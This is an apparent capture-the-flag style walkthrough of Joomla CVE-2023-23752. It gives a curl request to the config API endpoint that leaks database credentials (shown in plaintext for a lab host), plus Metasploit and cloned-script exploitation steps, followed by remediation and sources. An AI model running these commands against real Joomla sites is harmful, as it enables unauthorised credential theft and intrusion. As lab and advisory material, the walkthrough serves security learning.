Joomla versions between 4.0.0 and 4.2.7, inclusive, contain an improper API access vulnerability. This vulnerability allows unauthenticated users access to webservice endpoints which contain sensitive information. Specifically, for this module we exploit the users and config/application endpoints. This module was tested against Joomla 4.2.7 running on Docker.

As discussed, CVE-2023-23752 is an authentication bypass resulting in an information leak. Most of the public exploits use the bypass to leak the system's configuration, which contains the Joomla! MySQL database credentials in plaintext. The following demonstrates the leak:

  • curl -v http://dev.devvortex.htb/api/index.php/v1/config/application?public=true

In the proof of concept above, the server responds with the credentials lewis:P4ntherg0t1n5r3c0n##, which are the credentials for our test Joomla! MySQL account.

Affected Products

Joomla! 4.0.0

Joomla! 4.2.7

4.0.0 - 4.2.7

Identification

1. Scan Joomla using JoomScan script (https://github.com/OWASP/joomscan)

  • joomscan --url http://dev.devvortex.htb

Note: Knowing the version is between 4.0.0 - 4.2.7, we can assume this host is vulnerable.

Exploitation #1 (Metasploit)

1. We can use joomla_api_improper_access_checks to exploit this vulnerability

  • use auxiliary/scanner/http/joomla_api_improper_access_checks
  • show options

2. Now set the target host and port if required

  • set RHOSTS dev.devvortex.htb
  • run

Exploitation #2 (Script)

1. We can try another script (https://github.com/Acceis/exploit-CVE-2023-23752)

  • git clone https://github.com/Acceis/exploit-CVE-2023-23752.git
  • cd exploit-CVE-2023-23752
  • ls

2. Install dependencies (OPTIONAL)

  • gem install httpx docopt paint

3. Run the script help menu

  • ruby exploit.rb -h

4. Run the script

  • ruby exploit.rb http://dev.devvortex.htb

Remediation

Upgrade to the latest version of Joomla! CMS (4.2.8 or later), available from the Joomla! Web site.

Sources

https://vulncheck.com/blog/joomla-for-rce

https://exchange.xforce.ibmcloud.com/vulnerabilities/247706

https://developer.joomla.org/security-centre/894-20230201-core-improper-access-check-in-webservice-endpoints.html

https://packetstormsecurity.com/files/171474

https://www.mend.io/vulnerability-database/CVE-2023-23752

https://www.rapid7.com/db/modules/auxiliary/scanner/http/joomla_api_improper_access_checks/